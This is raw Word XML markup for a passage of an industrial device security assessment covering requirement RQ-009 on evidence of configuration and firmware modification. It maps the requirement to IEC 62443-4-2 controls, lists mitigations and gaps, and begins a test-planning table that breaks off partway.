    <w:p w14:paraId="1494A681" w14:textId="77777777" w:rsidR="006A564B" w:rsidRPr="006D5B99" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7905CFB4" w14:textId="77777777" w:rsidR="006A564B" w:rsidRPr="006D5B99" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="283B1261" w14:textId="77777777" w:rsidR="006A564B" w:rsidRPr="006D5B99" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25826863" w14:textId="77777777" w:rsidR="006A564B" w:rsidRPr="006D5B99" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60AAFF2A" w14:textId="77777777" w:rsidR="006A564B" w:rsidRPr="006D5B99" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FD9E3CE" w14:textId="77777777" w:rsidR="006A564B" w:rsidRPr="006D5B99" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40A16CF0" w14:textId="77777777" w:rsidR="006A564B" w:rsidRPr="006D5B99" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38EAE6FE" w14:textId="77777777" w:rsidR="006A564B" w:rsidRPr="006D5B99" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4212BC00" w14:textId="77777777" w:rsidR="006A564B" w:rsidRPr="006D5B99" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F9845E6" w14:textId="77777777" w:rsidR="006A564B" w:rsidRPr="006D5B99" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="671EFF5C" w14:textId="77777777" w:rsidR="006A564B" w:rsidRPr="006D5B99" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05976719" w14:textId="77777777" w:rsidR="006A564B" w:rsidRPr="006D5B99" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64DB89A7" w14:textId="77777777" w:rsidR="006A564B" w:rsidRPr="006D5B99" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33F57425" w14:textId="77777777" w:rsidR="00BC73A7" w:rsidRPr="006D5B99" w:rsidRDefault="00BC73A7" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35D6523B" w14:textId="77777777" w:rsidR="00BC73A7" w:rsidRPr="006D5B99" w:rsidRDefault="00BC73A7" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58317C8C" w14:textId="77777777" w:rsidR="00BC73A7" w:rsidRPr="006D5B99" w:rsidRDefault="00BC73A7" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B5AD624" w14:textId="77777777" w:rsidR="00BC73A7" w:rsidRPr="006D5B99" w:rsidRDefault="00BC73A7" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C2BFFD6" w14:textId="77777777" w:rsidR="00BC73A7" w:rsidRPr="006D5B99" w:rsidRDefault="00BC73A7" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C8CE52F" w14:textId="77777777" w:rsidR="00BC73A7" w:rsidRPr="006D5B99" w:rsidRDefault="00BC73A7" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02092BB4" w14:textId="77777777" w:rsidR="00BC73A7" w:rsidRPr="006D5B99" w:rsidRDefault="00BC73A7" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1785C5C6" w14:textId="77777777" w:rsidR="006A564B" w:rsidRPr="006D5B99" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DBA5AF1" w14:textId="77777777" w:rsidR="005C402F" w:rsidRPr="006D5B99" w:rsidRDefault="005C402F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F63F4C1" w14:textId="77777777" w:rsidR="005C402F" w:rsidRPr="006D5B99" w:rsidRDefault="005C402F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="495FE5A2" w14:textId="77777777" w:rsidR="005C402F" w:rsidRPr="006D5B99" w:rsidRDefault="005C402F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B69DFDF" w14:textId="77777777" w:rsidR="005C402F" w:rsidRPr="006D5B99" w:rsidRDefault="005C402F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BC5B1A0" w14:textId="77777777" w:rsidR="005C402F" w:rsidRPr="006D5B99" w:rsidRDefault="005C402F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CFAD5BC" w14:textId="77777777" w:rsidR="005C402F" w:rsidRPr="006D5B99" w:rsidRDefault="005C402F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72DBB475" w14:textId="77777777" w:rsidR="006A564B" w:rsidRPr="006D5B99" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E4FFE7D" w14:textId="77777777" w:rsidR="00287698" w:rsidRPr="006D5B99" w:rsidRDefault="00287698" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06EB81E7" w14:textId="77777777" w:rsidR="00F642E5" w:rsidRPr="006D5B99" w:rsidRDefault="00F642E5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CD04432" w14:textId="083F7EAE" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>REQUIREMENT 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD509E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E8A1AE" w14:textId="4A192CEA" w:rsidR="00686AD1" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MVO-ID: </w:t>
      </w:r>
      <w:r w:rsidR="00686AD1" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-009</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8F518D" w14:textId="4B79BA7A" w:rsidR="00686AD1" w:rsidRPr="006D5B99" w:rsidRDefault="00686AD1" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MVO Requirement Text: </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The system shall collect evidence of any modification of the installed software or its configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273850B0" w14:textId="1BD70104" w:rsidR="00686AD1" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IEC 62443-4-2 CR </w:t>
      </w:r>
      <w:r w:rsidR="001D4045" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mapping</w:t>
      </w:r>
      <w:r w:rsidR="00E57B4F" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00686AD1" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 2.8,</w:t>
      </w:r>
      <w:r w:rsidR="00623DA8" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 2.9, CR 2.10, CR 2.11,</w:t>
      </w:r>
      <w:r w:rsidR="00686AD1" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 2.12, </w:t>
      </w:r>
      <w:r w:rsidR="003D652C" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00686AD1" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CR 3.4</w:t>
      </w:r>
      <w:r w:rsidR="003D652C" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Addition,) CR 3.9, CR 6.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367C27D6" w14:textId="5B903F68" w:rsidR="00686AD1" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Assets: </w:t>
      </w:r>
      <w:r w:rsidR="00686AD1" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">B (Config); D (Firmware); </w:t>
      </w:r>
      <w:r w:rsidR="00B60D82" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>F (Do</w:t>
      </w:r>
      <w:r w:rsidR="008C1503" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>main separation)</w:t>
      </w:r>
      <w:r w:rsidR="003B5890" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; I (Audit Data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5411038C" w14:textId="2CECD472" w:rsidR="00686AD1" w:rsidRPr="006D5B99" w:rsidRDefault="00196EB6" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE: </w:t>
      </w:r>
      <w:r w:rsidR="007F5A7B" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00686AD1" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C1503" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(Tampering,) </w:t>
      </w:r>
      <w:r w:rsidR="00686AD1" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Repudiation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752142B4" w14:textId="77777777" w:rsidR="008D6120" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Function (Mitigation): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02090D4B" w14:textId="71318049"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iParCRC/F_ParCRC change + I&amp;M4 signature: Modification is fingerprinted (SRIO-3011).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304F9591" w14:textId="4E80C95C"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Acyclic config write blocked after param-end (SRIO-7749): temporal write gate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFBAE0C" w14:textId="6B5140AF" w:rsidR="00FB7743" w:rsidRPr="006D5B99" w:rsidRDefault="00FB7743" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FW/HW compatibility check + error-log entry; /firmware/version delta: Version modification observable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD7EDC4" w14:textId="1B61E5E9" w:rsidR="0007458C" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified Gap: </w:t>
      </w:r>
      <w:r w:rsidR="00686AD1" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BA3ED1" w14:textId="34DB51C1" w:rsidR="0033455C" w:rsidRPr="006D5B99" w:rsidRDefault="0033455C" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">G-1: Configuration is authored in the engineering tool, stored on the (password-protected) </w:t>
      </w:r>
      <w:r w:rsidR="00756315" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">PLC </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and pushed via fieldbus (SRIO-1983; System-Architecture §3.2). The actor is knowable, but only at the </w:t>
      </w:r>
      <w:r w:rsidR="00756315" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PL)</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">/engineering-tool layer, not device-resident </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> device-level CR 2.12 is architecturally delegated for this QM slave.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1108D91B" w14:textId="033A533E" w:rsidR="0033455C" w:rsidRPr="006D5B99" w:rsidRDefault="0033455C" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">G-2: No RTC; uptime resets on cold start </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> modifications not datable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B72BD47" w14:textId="68110184" w:rsidR="008B20F6" w:rsidRPr="006D5B99" w:rsidRDefault="0033455C" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-3 (asymmetric persistence)</w:t>
      </w:r>
      <w:r w:rsidR="00696A50" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00964A2C" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Error</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-Log detail is cleared on cold start (volatile). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B029FA2" w14:textId="77777777" w:rsidR="00942F11" w:rsidRPr="006D5B99" w:rsidRDefault="00942F11" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3855EFDB" w14:textId="09A8C7B8" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 2: Methodological Test Planning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DF7328"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6D5B99" w14:paraId="6477ED7B" w14:textId="77777777" w:rsidTr="00205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5563AEDE" w14:textId="77777777" w:rsidR="00900880" w:rsidRPr="006D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C385AE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793" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="490545F6"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618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A59BE9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867" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FF27B7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68687FA2"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67DE72AE" w14:textId="77777777" w:rsidR="00900880" w:rsidRPr="006D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3635" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5BE265BC" w14:textId="5D1AAA81" w:rsidR="00900880" w:rsidRPr="006D5B99"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config-modification evidence surface (iParCRC/I&amp;M4, Error Log) at baseline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1765C60D" w14:textId="63D9CC75" w:rsidR="00900880" w:rsidRPr="006D5B99"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6.1 met; CR 2.8 partial)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2618" w:type="dxa"/>
          </w:tcPr>
